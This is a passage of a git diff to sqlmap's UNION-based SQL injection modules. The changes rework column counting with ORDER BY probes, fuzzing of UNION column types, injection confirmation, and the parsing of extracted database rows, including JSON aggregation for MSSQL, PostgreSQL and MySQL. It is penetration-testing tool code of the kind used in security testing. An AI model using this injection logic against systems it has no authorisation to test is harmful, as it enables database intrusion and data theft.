False + if output and isListLike(output) and len(output) == 1: + output = unArrayizeValue(output) + + with kb.locks.value: + index = None + if threadData.shared.showEta: + threadData.shared.progress.progress(threadData.shared.counter) + for index in xrange(1 + len(threadData.shared.buffered)): + if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num: + break + threadData.shared.buffered.insert(index or 0, (num, output)) + while threadData.shared.buffered and threadData.shared.lastFlushed + 1 == threadData.shared.buffered[0][0]: + threadData.shared.lastFlushed += 1 + threadData.shared.value.append(threadData.shared.buffered[0][1]) + del threadData.shared.buffered[0] + + runThreads(numThreads, errorThread) + + except KeyboardInterrupt: + abortedFlag = True + warnMsg = "user aborted during enumeration. sqlmap " + warnMsg += "will display partial output" + logger.warning(warnMsg) + + finally: + threadData.shared.value.extend(_[1] for _ in sorted(threadData.shared.buffered)) + value = threadData.shared.value + kb.suppressResumeInfo = False if not value and not abortedFlag: value = _errorFields(expression, expressionFields, expressionFieldsList) - if value and isListLike(value) and len(value) == 1 and isinstance(value[0], basestring): - value = value[0] + if value and isListLike(value): + if len(value) == 1 and isinstance(value[0], (six.string_types, type(None))): + value = unArrayizeValue(value) + elif len(value) > 1 and stopLimit == 1: + value = [value] duration = calculateDeltaSeconds(start) if not kb.bruteMode: - debugMsg = "performed %d queries in %d seconds" % (kb.counters[kb.technique], duration) + debugMsg = "performed %d quer%s in %.2f seconds" % (kb.counters[getTechnique()], 'y' if kb.counters[getTechnique()] == 1 else "ies", duration) logger.debug(debugMsg) return value diff --git a/lib/techniques/union/__init__.py b/lib/techniques/union/__init__.py index 9e1072a9c4f..bcac841631b 100644 --- a/lib/techniques/union/__init__.py +++ b/lib/techniques/union/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ pass diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py index 76d0a1caef8..d5e8a44df05 100644 --- a/lib/techniques/union/test.py +++ b/lib/techniques/union/test.py @@ -1,16 +1,19 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +import itertools +import logging import random import re from lib.core.agent import agent from lib.core.common import average from lib.core.common import Backend +from lib.core.common import getPublicTypeMembers from lib.core.common import isNullValue from lib.core.common import listToStrValue from lib.core.common import popValue @@ -19,24 +22,32 @@ from lib.core.common import randomStr from lib.core.common import readInput from lib.core.common import removeReflectiveValues +from lib.core.common import setTechnique from lib.core.common import singleTimeLogMessage from lib.core.common import singleTimeWarnMessage from lib.core.common import stdev -from lib.core.common import wasLastRequestDBMSError +from lib.core.common import wasLastResponseDBMSError +from lib.core.compat import xrange from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger +from lib.core.data import queries +from lib.core.decorators import stackedmethod from lib.core.dicts import FROM_DUMMY_TABLE +from lib.core.enums import FUZZ_UNION_COLUMN from lib.core.enums import PAYLOAD +from lib.core.settings import FUZZ_UNION_ERROR_REGEX +from lib.core.settings import FUZZ_UNION_MAX_COLUMNS from lib.core.settings import LIMITED_ROWS_TEST_NUMBER -from lib.core.settings import UNION_MIN_RESPONSE_CHARS -from lib.core.settings import UNION_STDEV_COEFF -from lib.core.settings import MIN_RATIO from lib.core.settings import MAX_RATIO +from lib.core.settings import MIN_RATIO from lib.core.settings import MIN_STATISTICAL_RANGE from lib.core.settings import MIN_UNION_RESPONSES from lib.core.settings import NULL +from lib.core.settings import ORDER_BY_MAX from lib.core.settings import ORDER_BY_STEP +from lib.core.settings import UNION_MIN_RESPONSE_CHARS +from lib.core.settings import UNION_STDEV_COEFF from lib.core.unescaper import unescaper from lib.request.comparison import comparison from lib.request.connect import Connect as Request @@ -47,31 +58,35 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where= """ retVal = None - def _orderByTechnique(): + @stackedmethod + def _orderByTechnique(lowerCount=None, upperCount=None): def _orderByTest(cols): query = agent.prefixQuery("ORDER BY %d" % cols, prefix=prefix) query = agent.suffixQuery(query, suffix=suffix, comment=comment) payload = agent.payload(newValue=query, place=place, parameter=parameter, where=where) - page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) - return not re.search(r"(warning|error|order by|failed)", page or "", re.I) and comparison(page, headers) or re.search(r"data types cannot be compared or sorted", page or "", re.I) + page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False) + return not any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order (by|clause)", "unknown column", "failed")) and not kb.heavilyDynamic and comparison(page, headers, code) or re.search(r"data types cannot be compared or sorted", page or "", re.I) is not None - if _orderByTest(1) and not _orderByTest(randomInt()): - infoMsg = "ORDER BY technique seems to be usable. " + if _orderByTest(1 if lowerCount is None else lowerCount) and not _orderByTest(randomInt() if upperCount is None else upperCount + 1): + infoMsg = "'ORDER BY' technique appears to be usable. " infoMsg += "This should reduce the time needed " infoMsg += "to find the right number " infoMsg += "of query columns. Automatically extending the " infoMsg += "range for current UNION query injection technique test" singleTimeLogMessage(infoMsg) - lowCols, highCols = 1, ORDER_BY_STEP + lowCols, highCols = 1 if lowerCount is None else lowerCount, ORDER_BY_STEP if upperCount is None else upperCount found = None while not found: - if _orderByTest(highCols): + if not conf.uCols and _orderByTest(highCols): lowCols = highCols highCols += ORDER_BY_STEP + + if highCols > ORDER_BY_MAX: + break else: while not found: - mid = highCols - (highCols - lowCols) / 2 + mid = highCols - (highCols - lowCols) // 2 if _orderByTest(mid): lowCols = mid else: @@ -81,77 +96,118 @@ def _orderByTest(cols): return found - pushValue(kb.errorIsNone) - items, ratios = [], [] - kb.errorIsNone = False - lowerCount, upperCount = conf.uColsStart, conf.uColsStop + try: + pushValue(kb.errorIsNone) + items, ratios = [], [] + kb.errorIsNone = False + lowerCount, upperCount = conf.uColsStart, conf.uColsStop - if lowerCount == 1: - found = kb.orderByColumns or _orderByTechnique() - if found: - kb.orderByColumns = found - infoMsg = "target url appears to have %d column%s in query" % (found, 's' if found > 1 else "") - singleTimeLogMessage(infoMsg) - return found + if kb.orderByColumns is None and (lowerCount == 1 or conf.uCols): # Note: ORDER BY is not bullet-proof + found = _orderByTechnique(lowerCount, upperCount) if conf.uCols else _orderByTechnique() - if abs(upperCount - lowerCount) < MIN_UNION_RESPONSES: - upperCount = lowerCount + MIN_UNION_RESPONSES + if found: + kb.orderByColumns = found + infoMsg = "target URL appears to have %d column%s in query" % (found, 's' if found > 1 else "") + singleTimeLogMessage(infoMsg) + return found + elif kb.futileUnion: + return None - min_, max_ = MAX_RATIO, MIN_RATIO - pages = {} + if abs(upperCount - lowerCount) < MIN_UNION_RESPONSES: + upperCount = lowerCount + MIN_UNION_RESPONSES + + min_, max_ = MAX_RATIO, MIN_RATIO + pages = {} + + for count in xrange(lowerCount, upperCount + 1): + query = agent.forgeUnionQuery('', -1, count, comment, prefix, suffix, kb.uChar, where) + payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) + page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False) + + if not isNullValue(kb.uChar): + pages[count] = page + + ratio = comparison(page, headers, code, getRatioValue=True) or MIN_RATIO + ratios.append(ratio) + min_, max_ = min(min_, ratio), max(max_, ratio) + items.append((count, ratio)) - for count in xrange(lowerCount, upperCount + 1): - query = agent.forgeUnionQuery('', -1, count, comment, prefix, suffix, kb.uChar, where) - payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) - page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) if not isNullValue(kb.uChar): - pages[count] = page - ratio = comparison(page, headers, getRatioValue=True) or MIN_RATIO - ratios.append(ratio) - min_, max_ = min(min_, ratio), max(max_, ratio) - items.append((count, ratio)) - - if not isNullValue(kb.uChar): - for regex in (kb.uChar, r'>\s*%s\s*<' % kb.uChar): - contains = [(count, re.search(regex, page or "", re.IGNORECASE) is not None) for count, page in pages.items()] - if len(filter(lambda x: x[1], contains)) == 1: - retVal = filter(lambda x: x[1], contains)[0][0] - break + value = re.escape(kb.uChar.strip("'")) + for regex in (value, r'>\s*%s\s*<' % value): + contains = [count for count, content in pages.items() if re.search(regex, content or "", re.IGNORECASE) is not None] + if len(contains) == 1: + retVal = contains[0] + break + + if not retVal: + if min_ in ratios: + ratios.pop(ratios.index(min_)) + if max_ in ratios: + ratios.pop(ratios.index(max_)) + + minItem, maxItem = None, None + + for item in items: + if item[1] == min_: + minItem = item + elif item[1] == max_: + maxItem = item + + if all(_ == min_ and _ != max_ for _ in ratios): + retVal = maxItem[0] + + elif all(_ != min_ and _ == max_ for _ in ratios): + retVal = minItem[0] + + elif abs(max_ - min_) >= MIN_STATISTICAL_RANGE: + deviation = stdev(ratios) - if not retVal: - ratios.pop(ratios.index(min_)) - ratios.pop(ratios.index(max_)) + if deviation is not None: + lower, upper = average(ratios) - UNION_STDEV_COEFF * deviation, average(ratios) + UNION_STDEV_COEFF * deviation - minItem, maxItem = None, None + if min_ < lower: + retVal = minItem[0] - for item in items: - if item[1] == min_: - minItem = item - elif item[1] == max_: - maxItem = item + if max_ > upper: + if retVal is None or abs(max_ - upper) > abs(min_ - lower): + retVal = maxItem[0] + finally: + kb.errorIsNone = popValue() + + if retVal: + infoMsg = "target URL appears to be UNION injectable with %d columns" % retVal + singleTimeLogMessage(infoMsg, logging.INFO, re.sub(r"\d+", 'N', infoMsg)) - if all(map(lambda x: x == min_ and x != max_, ratios)): - retVal = maxItem[0] + return retVal - elif all(map(lambda x: x != min_ and x == max_, ratios)): - retVal = minItem[0] +def _fuzzUnionCols(place, parameter, prefix, suffix): + retVal = None - elif abs(max_ - min_) >= MIN_STATISTICAL_RANGE: - deviation = stdev(ratios) - lower, upper = average(ratios) - UNION_STDEV_COEFF * deviation, average(ratios) + UNION_STDEV_COEFF * deviation + if Backend.getIdentifiedDbms() and not re.search(FUZZ_UNION_ERROR_REGEX, kb.pageTemplate or "") and kb.orderByColumns: + comment = queries[Backend.getIdentifiedDbms()].comment.query - if min_ < lower: - retVal = minItem[0] + choices = getPublicTypeMembers(FUZZ_UNION_COLUMN, True) + random.shuffle(choices) - if max_ > upper: - if retVal is None or abs(max_ - upper) > abs(min_ - lower): - retVal = maxItem[0] + for candidate in itertools.product(choices, repeat=kb.orderByColumns): + if retVal: + break + elif FUZZ_UNION_COLUMN.STRING not in candidate: + continue + else: + candidate = [_.replace(FUZZ_UNION_COLUMN.INTEGER, str(randomInt())).replace(FUZZ_UNION_COLUMN.STRING, "'%s'" % randomStr(20)) for _ in candidate] - kb.errorIsNone = popValue() + query = agent.prefixQuery("UNION ALL SELECT %s%s" % (','.join(candidate), FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), "")), prefix=prefix) + query = agent.suffixQuery(query, suffix=suffix, comment=comment) + payload = agent.payload(newValue=query, place=place, parameter=parameter, where=PAYLOAD.WHERE.NEGATIVE) + page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False) - if retVal: - infoMsg = "target url appears to be UNION injectable with %d columns" % retVal - singleTimeLogMessage(infoMsg) + if not re.search(FUZZ_UNION_ERROR_REGEX, page or ""): + for column in candidate: + if column.startswith("'") and column.strip("'") in (page or ""): + retVal = [(_ if _ != column else "%s") for _ in candidate] + break return retVal @@ -159,79 +215,79 @@ def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLO validPayload = None vector = None - positions = range(0, count) + positions = [_ for _ in xrange(0, count)] # Unbiased approach for searching appropriate usable column random.shuffle(positions) - # For each column of the table (# of NULL) perform a request using - # the UNION ALL SELECT statement to test it the target url is - # affected by an exploitable union SQL injection vulnerability - for position in positions: - # Prepare expression with delimiters - randQuery = randomStr(UNION_MIN_RESPONSE_CHARS) - phrase = "%s%s%s".lower() % (kb.chars.start, randQuery, kb.chars.stop) - randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery) - randQueryUnescaped = unescaper.escape(randQueryProcessed) - - # Forge the union SQL injection request - query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where) - payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) - - # Perform the request - page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) - content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \ - removeReflectiveValues(listToStrValue(headers.headers if headers else None), \ - payload, True) or "") - - if content and phrase in content: - validPayload = payload - kb.unionDuplicates = content.count(phrase) > 1 - vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates) - - if where == PAYLOAD.WHERE.ORIGINAL: - # Prepare expression with delimiters - randQuery2 = randomStr(UNION_MIN_RESPONSE_CHARS) - phrase2 = "%s%s%s".lower() % (kb.chars.start, randQuery2, kb.chars.stop) - randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2) - randQueryUnescaped2 = unescaper.escape(randQueryProcessed2) - - # Confirm that it is a full union SQL injection - query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2) - payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) - - # Perform the request - page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) - content = "%s%s".lower() % (page or "", listToStrValue(headers.headers if headers else None) or "") - - if not all(_ in content for _ in (phrase, phrase2)): - vector = (position, count, comment, prefix, suffix, kb.uChar, PAYLOAD.WHERE.NEGATIVE, kb.unionDuplicates) - elif not kb.unionDuplicates: - fromTable = " FROM (%s) AS %s" % (" UNION ".join("SELECT %d%s%s" % (_, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""), " AS %s" % randomStr() if _ == 0 else "") for _ in xrange(LIMITED_ROWS_TEST_NUMBER)), randomStr()) - - # Check for limited row output - query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable) + for charCount in (UNION_MIN_RESPONSE_CHARS << 2, UNION_MIN_RESPONSE_CHARS): + if vector: + break + + # For each column of the table (# of NULL) perform a request using + # the UNION ALL SELECT statement to test it the target URL is + # affected by an exploitable union SQL injection vulnerability + for position in positions: + # Prepare expression with delimiters + randQuery = randomStr(charCount) + phrase = ("%s%s%s" % (kb.chars.start, randQuery, kb.chars.stop)).lower() + randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery) + randQueryUnescaped = unescaper.escape(randQueryProcessed) + + # Forge the union SQL injection request + query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where) + payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) + + # Perform the request + page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False) + content = ("%s%s" % (removeReflectiveValues(page, payload) or "", removeReflectiveValues(listToStrValue(headers.headers if headers else None), payload, True) or "")).lower() + + if content and phrase in content: + validPayload = payload + kb.unionDuplicates = len(re.findall(phrase, content, re.I)) > 1 + vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, conf.forcePartial, kb.tableFrom, kb.unionTemplate) + + if where == PAYLOAD.WHERE.ORIGINAL: + # Prepare expression with delimiters + randQuery2 = randomStr(charCount) + phrase2 = ("%s%s%s" % (kb.chars.start, randQuery2, kb.chars.stop)).lower() + randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2) + randQueryUnescaped2 = unescaper.escape(randQueryProcessed2) + + # Confirm that it is a full union SQL injection + query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2) payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) # Perform the request - page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) - content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \ - removeReflectiveValues(listToStrValue(headers.headers if headers else None), \ - payload, True) or "") - if content.count(phrase) > 0 and content.count(phrase) < LIMITED_ROWS_TEST_NUMBER: - warnMsg = "output with limited number of rows detected. Switching to partial mode" - logger.warn(warnMsg) - vector = (position, count, comment, prefix, suffix, kb.uChar, PAYLOAD.WHERE.NEGATIVE, kb.unionDuplicates) - - unionErrorCase = kb.errorIsNone and wasLastRequestDBMSError() - - if unionErrorCase and count > 1: - warnMsg = "combined UNION/error-based SQL injection case found on " - warnMsg += "column %d. sqlmap will try to find another " % (position + 1) - warnMsg += "column with better characteristics" - logger.warn(warnMsg) - else: - break + page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False) + content = ("%s%s" % (page or "", listToStrValue(headers.headers if headers else None) or "")).lower() + + if not all(_ in content for _ in (phrase, phrase2)): + vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, True, kb.tableFrom, kb.unionTemplate) + elif not kb.unionDuplicates: + fromTable = " FROM (%s) AS %s" % (" UNION ".join("SELECT %d%s%s" % (_, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""), " AS %s" % randomStr() if _ == 0 else "") for _ in xrange(LIMITED_ROWS_TEST_NUMBER)), randomStr()) + + # Check for limited row output + query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable) + payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) + + # Perform the request + page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False) + content = ("%s%s" % (removeReflectiveValues(page, payload) or "", removeReflectiveValues(listToStrValue(headers.headers if headers else None), payload, True) or "")).lower() + if content.count(phrase) > 0 and content.count(phrase) < LIMITED_ROWS_TEST_NUMBER: + warnMsg = "output with limited number of rows detected. Switching to partial mode" + logger.warning(warnMsg) + vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, True, kb.tableFrom, kb.unionTemplate) + + unionErrorCase = kb.errorIsNone and wasLastResponseDBMSError() + + if unionErrorCase and count > 1: + warnMsg = "combined UNION/error-based SQL injection case found on " + warnMsg += "column %d. sqlmap will try to find another " % (position + 1) + warnMsg += "column with better characteristics" + logger.warning(warnMsg) + else: + break return validPayload, vector @@ -252,33 +308,45 @@ def _unionConfirm(comment, place, parameter, prefix, suffix, count): def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix): """ - This method tests if the target url is affected by an union + This method tests if the target URL is affected by an union SQL injection vulnerability. The test is done up to 50 columns on the target database table """ validPayload = None vector = None + orderBy = kb.orderByColumns + uChars = (conf.uChar, kb.uChar) + where = PAYLOAD.WHERE.ORIGINAL if isNullValue(kb.uChar) else PAYLOAD.WHERE.NEGATIVE # In case that user explicitly stated number of columns affected if conf.uColsStop == conf.uColsStart: count = conf.uColsStart else: - count = _findUnionCharCount(comment, place, parameter, value, prefix, suffix, PAYLOAD.WHERE.ORIGINAL if isNullValue(kb.uChar) else PAYLOAD.WHERE.NEGATIVE) + count = _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where) if count: validPayload, vector = _unionConfirm(comment, place, parameter, prefix, suffix, count) - if not all([validPayload, vector]) and not all([conf.uChar, conf.dbms]): + if not all((validPayload, vector)) and not all((conf.uChar, conf.dbms, kb.unionTemplate)): + if Backend.getIdentifiedDbms() and kb.orderByColumns and kb.orderByColumns < FUZZ_UNION_MAX_COLUMNS: + if kb.fuzzUnionTest is None: + msg = "do you want to (re)try to find proper " + msg += "UNION column types with fuzzy test? [y/N] " + + kb.fuzzUnionTest = readInput(msg, default='N', boolean=True) + if kb.fuzzUnionTest: + kb.unionTemplate = _fuzzUnionCols(place, parameter, prefix, suffix) + warnMsg = "if UNION based SQL injection is not detected, " warnMsg += "please consider " - if not conf.uChar and count > 1 and kb.uChar == NULL: + if not conf.uChar and count > 1 and kb.uChar == NULL and conf.uValues is None: message = "injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] " - test = readInput(message, default="Y") - if test[0] not in ("y", "Y"): + + if not readInput(message, default='Y', boolean=True): warnMsg += "usage of option '--union-char' " - warnMsg += "(e.g. --union-char=1) " + warnMsg += "(e.g. '--union-char=1') " else: conf.uChar = kb.uChar = str(randomInt(2)) validPayload, vector = _unionConfirm(comment, place, parameter, prefix, suffix, count) @@ -288,24 +356,45 @@ def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix) warnMsg += "and/or try to force the " else: warnMsg += "forcing the " - warnMsg += "back-end DBMS (e.g. --dbms=mysql) " + warnMsg += "back-end DBMS (e.g. '--dbms=mysql') " - if not all([validPayload, vector]) and not warnMsg.endswith("consider "): + if not all((validPayload, vector)) and not warnMsg.endswith("consider "): singleTimeWarnMessage(warnMsg) + if orderBy is None and kb.orderByColumns is not None and not all((validPayload, vector)): # discard ORDER BY results (not usable - e.g. maybe invalid altogether) + conf.uChar, kb.uChar = uChars + validPayload, vector = _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix) + return validPayload, vector +@stackedmethod def unionTest(comment, place, parameter, value, prefix, suffix): """ - This method tests if the target url is affected by an union + This method tests if the target URL is affected by an union SQL injection vulnerability. The test is done up to 3*50 times """ if conf.direct: return - kb.technique = PAYLOAD.TECHNIQUE.UNION - validPayload, vector = _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix) + negativeLogic = kb.negativeLogic + setTechnique(PAYLOAD.TECHNIQUE.UNION) + + try: + if negativeLogic: + pushValue(kb.negativeLogic) + pushValue(conf.string) + pushValue(conf.code) + + kb.negativeLogic = False + conf.string = conf.code = None + + validPayload, vector = _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix) + finally: + if negativeLogic: + conf.code = popValue() + conf.string = popValue() + kb.negativeLogic = popValue() if validPayload: validPayload = agent.removePayloadDelimiters(validPayload) diff --git a/lib/techniques/union/use.py b/lib/techniques/union/use.py index efe62cb0a46..b544b56acde 100644 --- a/lib/techniques/union/use.py +++ b/lib/techniques/union/use.py @@ -1,14 +1,14 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +import json import re import time -from extra.safe2bin.safe2bin import safecharencode from lib.core.agent import agent from lib.core.bigarray import BigArray from lib.core.common import arrayizeValue @@ -17,13 +17,15 @@ from lib.core.common import clearConsoleLine from lib.core.common import dataToStdout from lib.core.common import extractRegexResult +from lib.core.common import firstNotNone from lib.core.common import flattenValue from lib.core.common import getConsoleWidth -from lib.core.common import getUnicode +from lib.core.common import getPartRun from lib.core.common import hashDBRetrieve from lib.core.common import hashDBWrite from lib.core.common import incrementCounter from lib.core.common import initTechnique +from lib.core.common import isDigit from lib.core.common import isListLike from lib.core.common import isNoneValue from lib.core.common import isNumPosStrValue @@ -33,109 +35,202 @@ from lib.core.common import singleTimeDebugMessage from lib.core.common import singleTimeWarnMessage from lib.core.common import unArrayizeValue -from lib.core.common import wasLastRequestDBMSError -from lib.core.convert import htmlunescape +from lib.core.common import wasLastResponseDBMSError +from lib.core.compat import xrange +from lib.core.convert import decodeBase64 +from lib.core.convert import getUnicode +from lib.core.convert import htmlUnescape from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.data import queries from lib.core.dicts import FROM_DUMMY_TABLE from lib.core.enums import DBMS +from lib.core.enums import HTTP_HEADER from lib.core.enums import PAYLOAD +from lib.core.exception import SqlmapDataException from lib.core.exception import SqlmapSyntaxException +from lib.core.settings import MAX_BUFFERED_PARTIAL_UNION_LENGTH +from lib.core.settings import NULL from lib.core.settings import SQL_SCALAR_REGEX from lib.core.settings import TURN_OFF_RESUME_INFO_LIMIT from lib.core.threads import getCurrentThreadData from lib.core.threads import runThreads from lib.core.unescaper import unescaper from lib.request.connect import Connect as Request +from lib.utils.progress import ProgressBar +from lib.utils.safe2bin import safecharencode +from thirdparty import six +from thirdparty.odict import OrderedDict def _oneShotUnionUse(expression, unpack=True, limited=False): - retVal = hashDBRetrieve("%s%s" % (conf.hexConvert, expression), checkConf=True) # as union data is stored raw unconverted + retVal = hashDBRetrieve("%s%s" % (conf.hexConvert or False, expression), checkConf=True) # as UNION data is stored raw unconverted threadData = getCurrentThreadData() threadData.resumed = retVal is not None if retVal is None: - # Prepare expression with delimiters - injExpression = unescaper.escape(agent.concatQuery(expression, unpack)) + vector = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector - where = PAYLOAD.WHERE.NEGATIVE if conf.limitStart or conf.limitStop else None + if not kb.jsonAggMode: + injExpression = unescaper.escape(agent.concatQuery(expression, unpack)) + kb.unionDuplicates = vector[7] + kb.forcePartialUnion = vector[8] + + # Note: introduced columns in 1.4.2.42#dev + try: + kb.tableFrom = vector[9] + kb.unionTemplate = vector[10] + except IndexError: + pass + + query = agent.forgeUnionQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, limited) + where = PAYLOAD.WHERE.NEGATIVE if conf.limitStart or conf.limitStop else vector[6] + else: + injExpression = unescaper.escape(expression) + where = vector[6] + query = agent.forgeUnionQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, False) - # Forge the union SQL injection request - vector = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector - kb.unionDuplicates = vector[7] - query = agent.forgeUnionQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, limited) payload = agent.payload(newValue=query, where=where) # Perform the request - page, headers = Request.queryPage(payload, content=True, raise404=False) + page, headers, _ = Request.queryPage(payload, content=True, raise404=False) - incrementCounter(PAYLOAD.TECHNIQUE.UNION) + if page and kb.chars.start.upper() in page and kb.chars.start not in page: + singleTimeWarnMessage("results seems to be upper-cased by force. sqlmap will automatically lower-case them") - # Parse the returned page to get the exact union-based - # SQL injection output - def _(regex): - return reduce(lambda x, y: x if x is not None else y, (\ - extractRegexResult(regex, removeReflectiveValues(page, payload), re.DOTALL | re.IGNORECASE), \ - extractRegexResult(regex, removeReflectiveValues(listToStrValue(headers.headers \ - if headers else None), payload, True), re.DOTALL | re.IGNORECASE)), \ - None) + page = page.lower() - # Automatically patching last char trimming cases - if kb.chars.stop not in (page or "") and kb.chars.stop[:-1] in (page or ""): - warnMsg = "automatically patching output having last char trimmed" - singleTimeWarnMessage(warnMsg) - page = page.replace(kb.chars.stop[:-1], kb.chars.stop) + incrementCounter(PAYLOAD.TECHNIQUE.UNION) - retVal = _("(?P<result>%s.*%s)" % (kb.chars.start, kb.chars.stop)) + if kb.jsonAggMode: + for _page in (page or "", (page or "").replace('\\"', '"')): + if Backend.isDbms(DBMS.MSSQL): + output = extractRegexResult(r"%s(?P<result>.*)%s" % (kb.chars.start, kb.chars.stop), removeReflectiveValues(_page, payload)) + + if output: + try: + retVal = None + output_decoded = htmlUnescape(output) + json_data = json.loads(output_decoded, object_pairs_hook=OrderedDict) + + if not isinstance(json_data, list): + json_data = [json_data] + + if json_data and isinstance(json_data[0], dict): + fields = list(json_data[0].keys()) + + if fields: + parts = [] + for row in json_data: + parts.append("%s%s%s" % (kb.chars.start, kb.chars.delimiter.join(getUnicode(row.get(field) or NULL) for field in fields), kb.chars.stop)) + retVal = "".join(parts) + except: + retVal = None + else: + retVal = getUnicode(retVal) + elif Backend.isDbms(DBMS.PGSQL): + output = extractRegexResult(r"(?P<result>%s.*%s)" % (kb.chars.start, kb.chars.stop), removeReflectiveValues(_page, payload)) + if output: + retVal = output + else: + output = extractRegexResult(r"%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop), removeReflectiveValues(_page, payload)) + if output: + try: + retVal = "" + for row in json.loads(output): + # NOTE: for cases with automatic MySQL Base64 encoding of JSON array values, like: ["base64:type15:MQ=="] + for match in re.finditer(r"base64:type\d+:([^ ]+)", row): + row = row.replace(match.group(0), decodeBase64(match.group(1), binary=False)) + retVal += "%s%s%s" % (kb.chars.start, row, kb.chars.stop) + except: + retVal = None + else: + retVal = getUnicode(retVal) + + if retVal: + break + else: + # Parse the returned page to get the exact UNION-based + # SQL injection output + def _(regex): + return firstNotNone( + extractRegexResult(regex, removeReflectiveValues(page, payload), re.DOTALL | re.IGNORECASE), + extractRegexResult(regex, removeReflectiveValues(listToStrValue((_ for _ in headers.headers if not _.startswith(HTTP_HEADER.URI)) if headers else None), payload, True), re.DOTALL | re.IGNORECASE) + ) + + # Automatically patching last char trimming cases + if kb.chars.stop not in (page or "") and kb.chars.stop[:-1] in (page or ""): + warnMsg = "automatically patching output having last char trimmed" + singleTimeWarnMessage(warnMsg) + page = page.replace(kb.chars.stop[:-1], kb.chars.stop) + + retVal = _("(?P<result>%s.*%s)" % (kb.chars.start, kb.chars.stop)) if retVal is not None: retVal = getUnicode(retVal, kb.pageEncoding) - # Special case when DBMS is Microsoft SQL Server and error message is used as a result of union injection - if Backend.isDbms(DBMS.MSSQL) and wasLastRequestDBMSError(): - retVal = htmlunescape(retVal).replace("<br>", "\n") + # Special case when DBMS is Microsoft SQL Server and error message is used as a result of UNION injection + if Backend.isDbms(DBMS.MSSQL) and wasLastResponseDBMSError(): + retVal = htmlUnescape(retVal).replace("<br>", "\n") - hashDBWrite("%s%s" % (conf.hexConvert, expression), retVal) - else: + hashDBWrite("%s%s" % (conf.hexConvert or False, expression), retVal) + + elif not kb.jsonAggMode: trimmed = _("%s(?P<result>.*?)<" % (kb.chars.start)) if trimmed: warnMsg = "possible server trimmed output detected " warnMsg += "(probably due to its length and/or content): " warnMsg += safecharencode(trimmed) - logger.warn(warnMsg) + logger.warning(warnMsg) + + elif re.search(r"ORDER BY [^ ]+\Z", expression): + debugMsg = "retrying failed SQL query without the 